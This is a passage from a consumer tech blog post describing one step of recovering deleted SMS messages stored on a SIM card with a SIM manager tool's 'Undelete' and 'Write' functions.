Step  3 -> Since, our aim here is to recover deleted messages, we would go to the "SMS messages" tab. To recover a message right click on a message and select "Undelete" option.  Once this is done, press the "Write" button to write it on the sim card. 

Note: The messages marked in "RED" are deleted messages where as the messages marked in black are the ones which are still available on the sim card.  

Ref:https://www.dekart.com/fileadmin/howto/Howto-recover-deleted-SMS/SIM-Manager-undelete-SMS.png

Note: Please note that this method can only be used to recover SMS messages that are stored on the SIM not Whatsapp, Viber etc messages. To overcome this, I would suggest you to use method 1. 
Read more

by Malik korrich ~ mardi 21 juillet 2015 0 commentaires

« Articles plus anciens